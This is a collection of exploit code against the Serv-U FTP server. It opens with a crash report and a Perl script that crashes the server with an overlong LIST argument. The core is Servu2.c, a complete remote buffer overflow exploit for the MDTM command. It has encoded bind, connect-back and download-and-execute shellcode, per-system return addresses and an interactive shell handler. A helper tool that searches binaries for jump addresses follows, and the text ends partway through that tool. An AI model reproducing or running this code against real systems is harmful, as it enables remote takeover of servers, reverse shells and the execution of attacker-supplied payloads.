Serv-U exploit <=
-----> ServUCrashReport.txt ************ SERV-U DAEMON CRASH REPORT ************
Date: Thu Apr 29 17:18:24 2004 Version: Version 5.0 Build: Reason: SERVUD~1.EXE caused a EXCEPTION_ACCESS_VIOLATION in module SERVUD~1.EXE at 001B:004238A3, _GetExceptDLLinfo()+141386 byte(s)
Registers: EAX=06E2029B EBX=00E500E4 ECX=00000000 EDX=00000000 ESI=FFFFFFF0 EDI=00E500E4 EBP=012DB4F0 ESP=012DB3A4 EIP=004238A3 FLG=00010286 CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
Stack Trace: 001B:004238A3 (0x012DBE1C 0x00E500E4 0x00000000 0x012DD248) SERVUD~1.EXE 001B:00422A93 (0x01E50034 0x012DD278 0x00000001 0x012DDA7C) SERVUD~1.EXE 001B:00421DE6 (0x01E50034 0x012DD278 0x012DE2D4 0x00E6013C) SERVUD~1.EXE 001B:00437837 (0x01E50034 0x00DF75A0 0x01E50034 0x01E50034) SERVUD~1.EXE 001B:00436FF2 (0x01E50034 0x012DE2D4 0x00DFDCA4 0x01E50034) SERVUD~1.EXE 001B:0043B63D (0x01E50034 0x00DF75A0 0x00DFDCA4 0x00000002) SERVUD~1.EXE 001B:004334DA (0x01E50034 0x00000008 0x00000002 0x00E10000) SERVUD~1.EXE 001B:0046C74E (0x00DFDCA4 0x00000200 0x00000008 0x012DFE74) SERVUD~1.EXE 001B:0049DBBA (0x0002001E 0x00000400 0x00000200 0x00000008) SERVUD~1.EXE 001B:77E1A2D0 (0x0049DAB8 0x0002001E 0x00000400 0x00000200) USER32.dll 001B:77DF45E5 (0x012DFE74 0x00000001 0x004013F5 0x012DFE74) USER32.dll 001B:77DF5B51 (0x00DE0038 0x011E0000 0x00EA0A88 0x00000001) USER32.dll 001B:0040206E (0x00000000 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE 001B:006947B5 (0x00EA0A88 0x0069497C 0x012DFFEC 0x77E6B382) SERVUD~1.EXE 001B:006947EF (0x00EA0A88 0x78700659 0x0013BBF0 0x00EA0A88) SERVUD~1.EXE 001B:77E6B382 (0x00000000 0x00000000 0x00000000 0x00000000) KERNEL32.DLL
-----> crash.pl #!/usr/bin/perl
use IO::Socket;
$host = "ftp.domain.ip"; $port = "21" $user = "username"; $pass = "password";
$remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => $port, );
unless ($remote) { die "cannot connect to ftp daemon on $host" }
print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } }
my $ftp = "USER $user\r\n";
print $remote $ftp; print $ftp; sleep(1);
while (<$remote>) { print $_; if (/331 /) { last; } }
$ftp = join("", "PASS ", "$pass", "\r\n"); print $remote $ftp; print $ftp; sleep(1);
while (<$remote>) { print $_; if (/230 /) { last; } }
my $ftp = join ("", "LIST -l:", "A"x(134), "\r\n");
print $remote $ftp; print $ftp; sleep(1);
while (<$remote>) { print $_; if (/250 Done/) { last; } }
close $remote;
2.exploit <
lion lion@cnhonker.net http://www.cnhonker.com 2004-02-28 [HUC] Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command Remote Exploit Servu2.c 20,889
2004-03-04 Serv-U Real Target and Search ASM Code Tool for Overflow Exploit. Servu2.c 21,756 sac.cpp 12,848
-----> Servu2.c /* *----------------------------------------------------------------------- * * Servu2.c - Serv-U FTPD 2.x/3.x/4.x/5.x "MDTM" Command * Remote stack buffer overflow exploit * * Copyright (C) 2004 HUC All Rights Reserved. * * Author : lion * : lion@cnhonker.net * : http://www.cnhonker.com * Date : 2004-01-07 * Update : 2004-02-24 Who report this bug to Rhino??? Released v5.0.0.4 patched this bug. * : 2004-02-17 v7.0 Add Download url file and exec shellcode. * : 2004-02-04 v6.1 Modified to work with UNIX. * : 2004-02-01 v6.0 Change decode and target, change 'jmp(call) ebx' addr to 'pop,pop,ret' addr, can attack winXP and win2003 now. * : 2004-01-31 v5.0 Add msvcrt.dll jmp ebx addr, can use on CN/TW/EN/KR/other win2k SP4 if msvcrt.dll not changed. * : 2004-01-26 v4.2 Change attack target, 2.x to '>= 2.5i' and '<= 2.5h'. * : 2004-01-22 v4.1 Change connectback shellcode in one, change bind shellcode to rebind shellcode. * : 2004-01-13 v4.0 Can attack Serv-U 2.x. * : 2004-01-11 v3.1 Add "PORT" command, can penetrate through the firewall. (shport > 1024) * : 2004-01-09 v3.0 Put shellcode in file parameter, can attack Serv-U * : 2004-01-08 v2.0 Add connectback shellcode. * : 2004-01-07 v1.0 Can attack Serv-U v3.0.0.16 ~ v4.1.0.11 * Tested : Windows 2000 Server EN/CN * : + Serv-U v3.0.0.16 ~ v5.0.0.3 * : + Serv-U v2.5b, v2.5e, v2.5h, v2.5i, v2.5k * : Windows XP EN/CN * : + Serv-U v4.x * Notice : *** Bug find by bkbll (bkbll@cnhonker.net) 2004-01-07 *** * : *** You need a valid account. include anonymous!!! *** * : *** Private exploit! Don't distributed it!!! *** * Complie :On Windows * : cl Servu2.c * :On UNIX * : gcc -o Servu2 Servu2.c -DUNIX * Usage :e:\>Servu2 * :Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V7.0 (2004-01-07) * :Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net) * :Welcome to HUC website http://www.cnhonker.com * :Usage: Servu2 -i <ip> [Options] * : -t Show All Target Type. * : * :[Options:] * : -i Target IP Required * : -t Target Type Default: 0 * : -u FTP Username Default: ftp * : -p FTP Password Default: ftp@ftp.com * : -f Port of the FTP Server Default: 21 * : -s Port of the Shell Default: 53 * : -c Connect back IP For connectback shellcode * : -d Download the URL and Exec Start with 'http://' or 'ftp://' *------------------------------------------------------------------------ */
#ifndef UNIX #include <winsock2.h> #include <windows.h> #include <stdio.h> #include <stdlib.h>
#pragma comment(lib, "ws2_32") #else #define uint32_t DWORD #include <sys/types.h> #include <sys/socket.h> #include <netdb.h> #include <netinet/in.h> #include <errno.h>
#define closesocket(val) close(val) #define SOCKET unsigned int #define SOCKADDR_IN struct sockaddr_in #define BOOL unsigned int #define TRUE 1 #define FALSE 0 #define INVALID_SOCKET -1 #define SOCKET_ERROR -1 #define USHORT unsigned int #define Sleep usleep #define __leave goto exit_try #define _snprintf snprintf typedef struct sockaddr* LPSOCKADDR; #endif
#ifdef UNIX int GetLastError() { return errno; }
int WSAGetLastError() { return errno; } #endif
#define MAX_LEN 2048 #define SEH_OFFSET 48-1 #define JMP_OVER "\xeb\x06\xeb\x06" #define VERSION "7.0"
// for rebind shellcode #define BIND_OFFSET 113
// for connectback shellcode #define PORT_OFFSET 95 #define IP_OFFSET 88
// default parameter #define SHELLPORT 53 #define FTPPORT 21 #define DEFTYPE 0 #define DEFUSER "ftp" #define DEFPASS "ftp@ftp.com"
// for Serv-U 2.x #define READ_ADDR "\x01\x01\xfd\x7f" #define READ_OFFSET 5+14+12
struct { DWORD dwJMP; char *szDescription; }targets[] = { {0x7801D07B,"Serv-U 3.x/4.x/5.x ALL 2K SP3/SP4"}, //msvcrt.dll pop,pop,ret addr // {0x78010394,"Serv-U 3.x/4.x/5.x ALL 2K SP4"}, //msvcrt.dll pop,pop,ret addr {0x77c22ca7,"Serv-U 3.x/4.x/5.x ALL XP SP1"}, //msvcrt.dll pop,pop,ret addr
// {0x7FFA1CB5,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003 {0x7ffa1571,"Serv-U 3.x/4.x/5.x CN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all CN win2000,winxp,win2003 {0x7ffa1c1b,"Serv-U 3.x/4.x/5.x EN 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all EN win2000,winxp,win2003 {0x7ffae617,"Serv-U 3.x/4.x/5.x TW 2K/XP/2K3 ALL"}, //pop,pop,ret addr for all TW win2000,winxp,win2003 // {0x7ffa2186,"Serv-U 3.x/4.x/5.x TW 2K ALL"}, //jmp ebx addr for all TW win2000 {0x7ffa4a1b,"Serv-U 3.x/4.x/5.x KR 2K ALL"}, //jmp ebx addr for all KR win2000
{0x7ffa4512,"Serv-U 2.x >= 2.5i CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003 {0x7ffa4512,"Serv-U 2.x <= 2.5h CN 2K/XP/2K3 ALL"}, //jmp esp addr for all CN win2000,winxp,win2003 {0x7ffa24ce,"Serv-U 2.x >= 2.5i TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003 {0x7ffa24ce,"Serv-U 2.x <= 2.5h TW 2K/XP/2K3 ALL"}, //jmp esp addr for all TW win2000,winxp,win2003
{0x7ffa82a4,"Serv-U 2.x >= 2.5i KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003 {0x7ffa82a4,"Serv-U 2.x <= 2.5h KR 2K/XP/2K3 ALL"}, //call esp addr for all KR win2000,winxp,win2003 {0x778e71a3,"Serv-U 2.x >= 2.5i EN 2K SP4"}, //setupapi.dll jmp esp addr {0x778e71a3,"Serv-U 2.x <= 2.5h EN 2K SP4"}, //setupapi.dll jmp esp addr
// {0x7802ba77,"Serv-U test"}, },v;
unsigned char *szSend[4]; unsigned char szCommand[MAX_LEN];
// 28 bytes decode by lion for overwrite eip, don't change this. unsigned char decode[]= "\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43\x39\x3B\x75" "\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// 31 bytes decode by lion for overwrite SEH, don't change this. unsigned char decode2[]= "\x5E\x5F\x5B\xBE\x6D\x69\x6F\x6E\x4E\xBF\x6D\x69\x30\x6E\x4F\x43" "\x39\x3B\x75\xFB\x4B\x80\x33\x99\x39\x73\xFC\x75\xF7\xFF\xD3";
// Shellcode start sign, use for decode, don't change this. unsigned char sc_start[]= "lion";
// Shellcode end sign, use for decode, don't change this. unsigned char sc_end[]= "li0n";
// 344 bytes rebind shellcode by lion for Serv-U (xor with 0x99) unsigned char sc[]= "\x70\xBB\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x5B\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9E\xC0\x71\x30\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98" "\xF3\x9B\x66\xCF\x8D\x12\x41\x5E\x9E\x98\x99\x99\x99\xF3\x9D\x14" "\x8E\xCB\xF3\x9D\xF1\x66\x66\x99\x99\xCA\x66\xCF\x81\x5E\x9E\x9B" "\x99\x99\xAC\x10\xDE\x9D\xF3\x89\xCE\xCA\x66\xCF\x85\xF3\x98\xCA" "\x66\xCF\xB9\xC9\xC9\xCA\x66\xCF\xBD\x12\x41\xAA\x59\xF1\xFA\xF4" "\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x8D\xC0\x10\x9D\x16" "\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10\xC6\xD1\x10" "\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8\xC8\xF3\x98" "\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66" "\xCF\x91\x72\x9E\x09\x09\x09\x09\x09\x09\x09\xCA\x66\xCF\xB1\x66" "\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF" "\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3" "\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC7" "\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44\x12\x9D" "\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x40\x67\x66\x66\x17\xD7\x97\x75" "\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52\x74\x65\xA2" "\x40\x90\x6C\x34\x75\x6B\xCC\x59\x3D\x83\xE9\x5E\x3D\x34\xB7\x70" "\x7C\xD0\x1F\xD0\x7E\xE0\x5F\xE0";
// 304 bytes connectback shellcode by lion for Serv-U (xor with 0x99) unsigned char cbsc[]= "\x70\x9C\x98\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\x05\x99\x99\x99" "\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE\xEA\xAB\xC6\xCD\x66\x8F\x12" "\x71\xF3\x9D\xC0\x71\x1A\x99\x99\x99\x7B\x60\x18\x75\x09\x98\x99" "\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF\x89\xC9\xC9\xC9\xC9\xF3\x98" "\xF3\x9B\x66\xCF\x8D\x12\x41\xF1\xE6\x99\x99\x98\xF1\x9B\x99\x99" "\xAC\x12\x55\xF3\x89\xC8\xCA\x66\xCF\x81\x1C\x59\xEC\xD2\xAA\x59" "\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD\x12\x65\xF3\x89\xC0" "\x10\x9D\x16\x7B\x62\x5F\xDE\x89\xDD\x67\xDE\xA5\x67\xDE\xA4\x10" "\xC6\xD1\x10\xC6\xD5\x10\xC6\xC9\x14\xDD\xBD\x89\xCE\xC9\xC8\xC8" "\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66\xCF\x9D\x12\x55\xF3\x66" "\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66\xCF\x95\xC8\xCF\x12\xEC" "\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF\x12\xEF\xB9\x9A\x6C\x72\x9E\x09" "\x09\x09\x09\x09\x09\x09\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96" "\x27\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86" "\xEC\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A" "\x44\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x6F\x67\x66\x66\x17" "\xD7\x97\x75\xEB\x67\x2A\x8F\x34\x40\x9C\x57\xE7\x41\x7B\xEA\x52" "\x74\x65\xA2\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0\x99";
// 194 bytes download url file and exec shellcode by lion (xor with 0x99) // Tested on Serv-U 3.x/4.x/5.x unsigned char dusc[]= "\x70\x3D\x99\x99\x99\xC6\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12" "\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3\x9D\xC0\x71\xDD\x99\x99\x99" "\x7B\x60\xF1\xF6\xF7\x99\x99\xF1\xEC\xEB\xF5\xF4\xCD\x66\x8F\x12" "\x71\x71\xB7\x99\x99\x99\x1A\x75\xB9\x12\x45\xF3\xB9\xCA\x66\xCF" "\x9D\x5E\x9D\x9A\xC5\xF8\xB7\xFC\x5E\xDD\x9A\x9D\xE1\xFC\x99\x99" "\xAA\x59\xC9\xC9\xCA\xCE\xC9\x66\xCF\x89\x12\x45\xC9\xCA\x66\xCF" "\x91\x66\xCF\x95\xC8\xCF\x12\xEC\xA5\x12\xED\xB7\xE1\x9A\x6C\xCF" "\x12\xEF\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27" "\x89\xA3\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC" "\x7E\xC7\x12\xC7\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC7\x85\x9A\x44" "\x12\x9D\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\xCE\x66\x66\x66\x17\xD7" "\x97\x75\x58\xE0\x7C\x21\x01\x67\x13\x97\xE7\x41\x7B\xEA\xAF\x83" "\xB6\xE9";
// exec file url addr for download url file and exec shellcode unsigned char downloadurl[255]= "";
void showtype() { int i; // usage(p); printf( "[Type]:\n"); for(i=0;i<sizeof(targets)/sizeof(v);i++) { printf("\t%d\t0x%x\t%s\n", i, targets[i].dwJMP, targets[i].szDescription); } }
void usage(char *p) { printf( "Usage:\t%s\t-i <ip> [Options]\n" "\t\t-t\tShow All Target Type.\n\n" "[Options:]\n" "\t-i\tTarget IP Required\n" "\t-t\tTarget Type Default: %d\n" "\t-u\tFTP Username Default: %s\n" "\t-p\tFTP Password Default: %s\n" "\t-f\tPort of the FTP Server Default: %d\n" "\t-s\tPort of the Shell Default: %d\n" "\t-c\tConnect back IP For connectback shellcode\n" "\t-d\tDownload the URL and Exec Start with 'http://' or 'ftp://'\n\n" , p, DEFTYPE, DEFUSER, DEFPASS, FTPPORT, SHELLPORT);
//showtype(); }
/* ripped from TESO code and modifed by ey4s for win32 */ void shell (int sock) { int l; char buf[512]; struct timeval time; unsigned long ul[2];
time.tv_sec = 1; time.tv_usec = 0;
while (1) { ul[0] = 1; ul[1] = sock;
l = select (0, (fd_set *)&ul, NULL, NULL, &time); if(l == 1) { l = recv (sock, buf, sizeof (buf), 0); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } l = write (1, buf, l); if (l <= 0) { printf ("[-] Connection closed.\n"); return; } } else { l = read (0, buf, sizeof (buf)); if (l <= 0) { printf("[-] Connection closed.\n"); return; } l = send(sock, buf, l, 0); if (l <= 0) { printf("[-] Connection closed.\n"); return; } } } }
int main(int argc, char **argv) { struct sockaddr_in sa, server, client; #ifndef UNIX WSADATA wsd; #endif SOCKET s, s2, s3; int iErr, ret, len; char szRecvBuff[MAX_LEN]; int i,j; int iType =DEFTYPE, iPort=FTPPORT; char *ip=NULL, *pUser=DEFUSER, *pPass=DEFPASS, *cbHost=NULL, *url; char user[128], pass[128]; BOOL bCb=FALSE,bUrl=FALSE, bLocal=TRUE, b2x=FALSE; unsigned short shport=SHELLPORT, shport2=0; unsigned long cbip; unsigned int timeout=5000, Reuse; char penetrate[255],cbHost2[20]; printf( "Serv-U FTPD 2.x/3.x/4.x/5.x remote overflow exploit V%s (2004-01-07)\r\n" "Bug find by bkbll (bkbll@cnhonker.net), Code by lion (lion@cnhonker.net)\r\n" "Welcome to HUC website http://www.cnhonker.com\r\n\n" , VERSION);
if(argc < 2) { usage(argv[0]); return 1; } else if(argc == 2 && argv[1][1] == 't') { showtype(); return 1; }
for(i=1;i<argc;i+=2) { if(strlen(argv[i]) != 2) { usage(argv[0]); return -1; } // check parameter if(i == argc-1) { usage(argv[0]); return -1; } switch(argv[i][1]) { case 'i': ip=argv[i+1]; break; case 't': iType = atoi(argv[i+1]); break; case 'f': iPort=atoi(argv[i+1]); break; case 'p': pPass = argv[i+1]; break; case 'u': pUser=argv[i+1]; break; case 's': shport=atoi(argv[i+1]); break; case 'c': cbHost=argv[i+1]; bCb=TRUE; break; case 'd': url = argv[i+1]; bUrl=TRUE; break; } }
if((!ip) || (!user) || (!pass)) { usage(argv[0]); printf("[-] Invalid parameter.\n"); return -1; }
if( (iType<0) || (iType>=sizeof(targets)/sizeof(v)) ) { usage(argv[0]); printf("[-] Invalid type.\n"); return -1; }
if(iPort <1 || iPort >65535 || shport <1 || shport > 65535) { usage(argv[0]); printf("[-] Invalid port.\n"); return -1; }
if(bUrl) { if( (!strstr(url, "http://") && !strstr(url, "ftp://")) || strlen(url) < 10 || strlen(url) > 255) { usage(argv[0]); printf("[-] Invalid url. Must start with 'http://','ftp://' and <255 bytes.\n"); return -1; } } if(strstr(targets[iType].szDescription, "2.x")) { b2x = TRUE; printf("[*] Attack Target is Serv-U 2.x.\r\n"); } else { printf("[*] Attack Target is Serv-U 3.x/4.x/5.x.\r\n"); } _snprintf(user, sizeof(user)-1, "USER %s\r\n", pUser); user[sizeof(user)-1]='\0'; _snprintf(pass, sizeof(pass)-1, "PASS %s\r\n", pPass); pass[sizeof(pass)-1]='\0'; szSend[0] = user; //user szSend[1] = pass; //pass szSend[2] = penetrate; //pentrate szSend[3] = szCommand; //shellcode // Penetrate through the firewall. if(bCb && shport > 1024) { strncpy(cbHost2, cbHost, 20); for(i=0;i<strlen(cbHost); i++) { if(cbHost[i] == '.') cbHost2[i] = ','; } sprintf(penetrate, "PORT %s,%d,%d\r\n", cbHost2, shport/256, shport%256);
//printf("%s", penetrate); } else { sprintf(penetrate,"TYPE I\r\n"); }
// fill the "MDTM" command strcpy(szCommand, "MDTM 20031111111111+");
// fill the egg for(i=0; i<SEH_OFFSET; i++) { strcat(szCommand, "\x90"); }
// ret addr if(b2x) {
// fill the egg if(strstr(targets[iType].szDescription, "<")) { j = 8; } else { j = 4; } for(i=0; i<j; i++) { strcat(szCommand, "\x90"); } memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4); memcpy(&szCommand[READ_OFFSET], &READ_ADDR, 4); // fill the decode strcat(szCommand, decode); } else { // fill the seh for(i=0; i<0x10*1; i+=8) //for(i=0; i<1; i++) { memcpy(&szCommand[strlen(szCommand)], &JMP_OVER, 4); memcpy(&szCommand[strlen(szCommand)], &targets[iType].dwJMP, 4); } // fill the decode strcat(szCommand, decode2); }
// fill the space strcat(szCommand, " ");
// fill the egg for(i=0; i<0x10; i++) { strcat(szCommand, "\x90"); }
// fill the shellcode start sign strcat(szCommand, sc_start);
// fill the shellcode if(bCb) { // connectback shellcode shport2 = htons(shport)^(u_short)0x9999; cbip = inet_addr(cbHost)^0x99999999; memcpy(&cbsc[PORT_OFFSET], &shport2, 2); memcpy(&cbsc[IP_OFFSET], &cbip, 4); strcat(szCommand, cbsc); } else if(bUrl) { memset(downloadurl, 0, sizeof(downloadurl));
// download url exec shellcode for(i=0;i<strlen(url);i++) { downloadurl[i] = url[i] ^ 0x99; } downloadurl[i] ^= 0x99; strcat(szCommand, dusc); strcat(szCommand, downloadurl); } else { // rebind shellcode shport2 = htons(shport)^(u_short)0x9999; memcpy(&sc[BIND_OFFSET], &shport2, 2); strcat(szCommand, sc); }
// fill the shellcode end sign strcat(szCommand, sc_end);
// send end strcat(szCommand, "\r\n");
if(strlen(szCommand) >= sizeof(szCommand)) { printf("[-] stack buffer overflow.\n"); return -1; } //printf("send size %d:%s", strlen(szCommand), szCommand); //printf("buffsize %d\r\n", strlen(szCommand)-5-2); #ifndef UNIX __try #endif {
#ifndef UNIX if (WSAStartup(MAKEWORD(1,1), &wsd) != 0) { printf("[-] WSAStartup error:%d\n", WSAGetLastError()); __leave; } #endif s=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if(s == INVALID_SOCKET) { printf("[-] Create socket failed:%d",GetLastError()); __leave; }
sa.sin_family=AF_INET; sa.sin_port=htons((USHORT)iPort);
#ifndef UNIX sa.sin_addr.S_un.S_addr=inet_addr(ip); #else sa.sin_addr.s_addr=inet_addr(ip); #endif setsockopt(s,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int)); iErr = connect(s,(struct sockaddr *)&sa,sizeof(sa)); if(iErr == SOCKET_ERROR) { printf("[-] Connect to %s:%d error:%d\n", ip, iPort, GetLastError()); __leave; } printf("[+] Connect to %s:%d success.\n", ip, iPort); if(bCb) { Sleep(500); s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
#ifndef UNIX server.sin_addr.S_un.S_addr=inet_addr(cbHost); //server.sin_addr.s_addr=INADDR_ANY; #else server.sin_addr.s_addr=inet_addr(cbHost); #endif server.sin_port=htons((unsigned short)shport);
setsockopt(s2,SOL_SOCKET,SO_RCVTIMEO,(char *)&timeout,sizeof(unsigned int));
Reuse = 1; setsockopt(s2, SOL_SOCKET, SO_REUSEADDR, (char*)&Reuse, sizeof(Reuse));
if(bind(s2,(LPSOCKADDR)&server,sizeof(server))==SOCKET_ERROR) { printf("[-] Bind port on %s:%d error.\n", cbHost, shport); printf("[-] You must run nc get the shell.\n"); bLocal = FALSE; //closesocket(s2); //__leave; } else { printf("[+] Bind port on %s:%d success.\n", cbHost, shport); listen(s2, 1); } } for(i=0;i<sizeof(szSend)/sizeof(szSend[0]);i++) { memset(szRecvBuff, 0, sizeof(szRecvBuff)); iErr = recv(s, szRecvBuff, sizeof(szRecvBuff), 0); if(iErr == SOCKET_ERROR) { printf("[-] Recv buffer error:%d.\n", WSAGetLastError()); __leave; } printf("[+] Recv: %s", szRecvBuff); if(szRecvBuff[0] == '5') { printf("[-] Server return a error Message.\r\n"); __leave; }
iErr = send(s, szSend[i], strlen(szSend[i]),0); if(iErr == SOCKET_ERROR) { printf("[-] Send buffer error:%d.\n", WSAGetLastError()); __leave; }
if(i==sizeof(szSend)/sizeof(szSend[0])-1) printf("[+] Send shellcode %d bytes.\n", iErr); else printf("[+] Send: %s", szSend[i]); }
if(bUrl) { printf("[+] Target Download the file and exec: %s\r\n", url); printf("[+] Success? Maybe!\r\n"); } else { printf("[+] If you don't have a shell it didn't work.\n"); if(bCb) { if(bLocal) { printf("[+] Wait for shell...\n"); len = sizeof(client); s3 = accept(s2, (struct sockaddr*)&client, &len); if(s3 != INVALID_SOCKET) { printf("[+] Exploit success! Good luck! :)\n"); printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n"); shell(s3); } } } else { printf("[+] Connect to shell...\n"); Sleep(1000); s2 = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); server.sin_family = AF_INET; server.sin_port = htons(shport); server.sin_addr.s_addr=inet_addr(ip);
ret = connect(s2, (struct sockaddr *)&server, sizeof(server)); if(ret!=0) { printf("[-] Exploit seem failed.\n"); __leave; } printf("[+] Exploit success! Good luck! :)\n"); printf("[+] ===--===--===--===--===--===--===--===--===--===--===--===--===--===\n"); shell(s2); } } }
#ifdef UNIX exit_try: #endif
#ifndef UNIX __finally #endif { if(s != INVALID_SOCKET) closesocket(s); if(s2 != INVALID_SOCKET) closesocket(s2); if(s3 != INVALID_SOCKET) closesocket(s3); #ifndef UNIX WSACleanup(); #endif }
return 0; }
-----> sac.cpp /* ************************************************************************************ * * esp.cpp - Search ASM Code for Overflow exploit. * * Copyright (C) 2004 HUC All Rights Reserved. * * Author : lion * : lion@cnhonker.net * : http://www.cnhonker.com * : * Notice :1. The magic address found in msvcrt.dll on the same systems(for example,win2000 sp4) are universal, even they have diffrent system language. * :2. The magic address found from the address 0x7ffa0000 is universal on the same language system(for example, the address can work on the Chinese Simplified win2k,winxp,win2003 system) * : * Date : 2004-01-28 * : * Complie : cl sac.cpp * : * Usage :E:\>cl sac.cpp * : * :E:\>sac -r xpret -d nodll * : * :E:\>sac -r xpret -d msvcrt.dll * : * ---------------------------------------------------------------------------------- * * ASM Code: * * call eax FF D0 * call ebx FF D3 * call ecx FF D1 * call edx FF D2 * call edi FF D7 * call esi FF D6 * call esp FF D4 * call ebp FF D5 * * call [eax] FF 10 * call [ebx] FF 13 * call [ecx] FF 11 * call [edx] FF 12 * call [edi] FF 17 * call [esi] FF 16 * call [esp] FF 14 24 * call [ebp] FF 55 00 * * jmp eax FF E0 * jmp ebx FF E3 * jmp ecx FF E1 * jmp edx FF E2 * jmp edi FF E7 * jmp esi FF E6 * jmp esp FF E4 * jmp ebp FF E5 * * jmp [eax] FF 20 * jmp [ebx] FF 23 * jmp [ecx] FF 21 * jmp [edx] FF 22 * jmp [edi] FF 27 * jmp [esi] FF 26 * jmp [esp] FF 24 24 * jmp [ebp] FF 65 00 * * push eax 50 * push ebx 53 * push ecx 51 * push edx 52 * push edi 57 * push esi 56 * push esp 54 * push ebp 55 * * push [eax] FF 30 * push [ebx] FF 33 * push [ecx] FF 31 * push [edx] FF 32 * push [edi] FF 37 * push [esi] FF 36 * push [esp] FF 34 24 * push [ebp] FF 75 00 * * pop eax 58 * pop ebx 5B * pop ecx 59 * pop edx 5A * pop edi 5F * pop esi 5E * pop esp 5C * pop ebp 5D * * ret C3 * ************************************************************************************ */
#include <stdio.h> #include <stdlib.h> #include <windows.h>
#pragma comment(lib, "Version.lib")
#define VERSION "0.30" #define SEARCHLEN 10
void usage(char *p) { printf("Usage:\t%s\t-r <register> [Options]\n" "\t\t-v Show System Version\n\n" "[Options:]\n" "\t-r\tregister \tEAX, EBX, ECX, EDX, ESI, EDI, ESP, EBP, XPRET\n" "\t-d\tdllname \tNODLL (0x7FFA0000), MSVCRT, USER32 or Other\n" // "\t-l\tlogfile \tlog.txt\n" "\n", p); }
BOOL DisplaySystemVersion() { OSVERSIONINFOEX osvi; BOOL bOsVersionInfoEx;
// Try calling GetVersionEx using the OSVERSIONINFOEX structure. // // If that fails, try using the OSVERSIONINFO structure.
ZeroMemory(&osvi, sizeof(OSVERSIONINFOEX)); osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEX);
if( !(bOsVersionInfoEx = GetVersionEx ((OSVERSIONINFO *) &osvi)) ) { // If OSVERSIONINFOEX doesn't work, try OSVERSIONINFO.
osvi.dwOSVersionInfoSize = sizeof (OSVERSIONINFO); if (! GetVersionEx ( (OSVERSIONINFO *) &osvi) ) return FALSE; }
switch (osvi.dwPlatformId) { case VER_PLATFORM_WIN32_NT:
// Test for the product.
if ( osvi.dwMajorVersion <= 4 ) printf("Microsoft Windows NT ");
if ( osvi.dwMajorVersion == 5 && osvi.dwMinorVersion == 0 ) printf ("Microsoft Windows 2000 ");
